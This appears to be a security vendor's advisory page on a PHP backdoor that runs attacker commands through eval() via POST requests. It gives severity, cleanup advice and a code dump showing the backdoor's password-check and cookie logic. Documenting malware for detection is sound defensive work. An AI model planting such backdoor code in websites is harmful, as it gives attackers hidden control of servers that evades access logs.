PRICING SUPPORT LOGIN

Backdoor that uses the PHP eval() function to execute system commands passed through a POST request to the infected website.
This malware allows attackers to execute any php command or even system commands if available.
POST requests are not usually logged thus making it harder to identify the behavior on server access log files.

Severity

HIGH

Affecting

This malicious code affects any vulnerable or compromised website that is configured to interpret the script language.

Cleanup

Inspect your site's files, specially theme related, to find for code you don't recognize. Look for any encoded or obfuscated PHP code.
Also, you can sign up with us and let our team remove the malware for you.

Dump

if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
{
if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
{
$_POST['pass'] = md5($_POST['pass']);
}
if($_POST['pass'] == $password)
{
setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
}
reload();
}